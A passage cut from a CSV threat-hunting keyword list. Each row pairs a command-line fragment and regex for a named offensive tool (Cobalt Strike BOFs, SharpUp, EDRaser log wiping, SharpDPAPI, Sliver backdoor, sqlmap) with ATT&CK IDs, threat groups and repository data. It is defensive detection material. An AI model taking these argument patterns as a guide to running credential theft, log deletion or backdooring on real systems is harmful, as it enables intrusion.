Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera -
APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* --assemblyargs AppLocker*",".{0,1000}\s\-\-assemblyargs\sAppLocker.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* Athena.Commands*",".{0,1000}\sAthena\.Commands.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "* Athena.Models.*",".{0,1000}\sAthena\.Models\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "* athena.mythic*",".{0,1000}\sathena\.mythic.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "* atomizer.py *",".{0,1000}\satomizer\.py\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","9","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "* --attack bruteforce*",".{0,1000}\s\-\-attack\sbruteforce.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "* --attack injection*",".{0,1000}\s\-\-attack\sinjection.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "* --attack partial_d --key *",".{0,1000}\s\-\-attack\spartial_d\s\-\-key\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --attack partial_q --key *",".{0,1000}\s\-\-attack\spartial_q\s\-\-key\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -attack remote_db -db_type * -db_username * -db_password *",".{0,1000}\s\-attack\sremote_db\s\-db_type\s.{0,1000}\s\-db_username\s.{0,1000}\s\-db_password\s.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "* --attack vulns *",".{0,1000}\s\-\-attack\svulns\s.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "* -attack windows_application_event_log_local*",".{0,1000}\s\-attack\swindows_application_event_log_local.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "* -attack windows_event_log*",".{0,1000}\s\-attack\swindows_event_log.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "* -attack windows_security_event_log_remote*",".{0,1000}\s\-attack\swindows_security_event_log_remote.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "* --attacker-host *",".{0,1000}\s\-\-attacker\-host\s.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","0","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "* --attacker-port *",".{0,1000}\s\-\-attacker\-port\s.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","0","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "* -attak syslog*",".{0,1000}\s\-attak\ssyslog.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "* audit AlwaysInstallElevated*",".{0,1000}\saudit\sAlwaysInstallElevated.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. 
Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit CachedGPPPassword*",".{0,1000}\saudit\sCachedGPPPassword.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit DomainGPPPassword*",".{0,1000}\saudit\sDomainGPPPassword.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit HijackablePaths*",".{0,1000}\saudit\sHijackablePaths.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit McAfeeSitelistFiles*",".{0,1000}\saudit\sMcAfeeSitelistFiles.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. 
only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit ModifiableScheduledTask*",".{0,1000}\saudit\sModifiableScheduledTask.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit ModifiableServiceBinaries*",".{0,1000}\saudit\sModifiableServiceBinaries.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit ModifiableServiceRegistryKeys*",".{0,1000}\saudit\sModifiableServiceRegistryKeys.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit ModifiableServices*",".{0,1000}\saudit\sModifiableServices.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit ProcessDLLHijack*",".{0,1000}\saudit\sProcessDLLHijack.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit RegistryAutoLogons*",".{0,1000}\saudit\sRegistryAutoLogons.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit RegistryAutoruns*",".{0,1000}\saudit\sRegistryAutoruns.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit TokenPrivileges*",".{0,1000}\saudit\sTokenPrivileges.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit UnattendedInstallFiles*",".{0,1000}\saudit\sUnattendedInstallFiles.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit UnquotedServicePath*",".{0,1000}\saudit\sUnquotedServicePath.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* --authmode ntlm --username * --password *",".{0,1000}\s\-\-authmode\sntlm\s\-\-username\s.{0,1000}\s\-\-password\s.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "* Author:ph4ntom*",".{0,1000}\sAuthor\:ph4ntom.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "* auth-owners.nse*",".{0,1000}\sauth\-owners\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* auth-spoof.nse*",".{0,1000}\sauth\-spoof\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* autorecon.py *",".{0,1000}\sautorecon\.py\s.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "* AutoSUID.sh*",".{0,1000}\sAutoSUID\.sh.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","7","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "* avred.py *",".{0,1000}\savred\.py\s.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "* avredweb.py *",".{0,1000}\savredweb\.py\s.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "* 
awsloot.py*",".{0,1000}\sawsloot\.py.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","1","69","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "* -b *.bin *.bin dump*",".{0,1000}\s\-b\s.{0,1000}\.bin\s.{0,1000}\.bin\sdump.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","330","57","2024-04-03T11:48:50Z","2019-03-20T22:30:58Z" "* BabelStrike.py*",".{0,1000}\sBabelStrike\.py.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. 
from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","1","2","110","22","2023-12-16T13:51:54Z","2023-01-10T07:59:00Z" "* --backdoor *",".{0,1000}\s\-\-backdoor\s.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","N/A","10","8","798","128","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" "* backdoor --profile windows-shellcode *",".{0,1000}\sbackdoor\s\-\-profile\swindows\-shellcode\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* backdoor.py*",".{0,1000}\sbackdoor\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "* backorifice-brute.nse*",".{0,1000}\sbackorifice\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* backorifice-info.nse*",".{0,1000}\sbackorifice\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* backupcreds.exe*",".{0,1000}\sbackupcreds\.exe.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "* backupkey* /server:* /file*.pvk*",".{0,1000}\sbackupkey.{0,1000}\s\/server\:.{0,1000}\s\/file.{0,1000}\.pvk.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "* bacnet-info.nse*",".{0,1000}\sbacnet\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* badrat.ps1*",".{0,1000}\sbadrat\.ps1.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "* badrat_cs.exe*",".{0,1000}\sbadrat_cs\.exe.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "* badrat_server.py*",".{0,1000}\sbadrat_server\.py.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "* banner.nse*",".{0,1000}\sbanner\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* base64_encode_shellcode*",".{0,1000}\sbase64_encode_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" "* --basic ""FUZZ:FUZ2Z""*",".{0,1000}\s\-\-basic\s\""FUZZ\:FUZ2Z\"".{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --batch --dbs*",".{0,1000}\s\-\-batch\s\-\-dbs.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* --batch --password*",".{0,1000}\s\-\-batch\s\-\-password.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* beacon.dll*",".{0,1000}\sbeacon\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
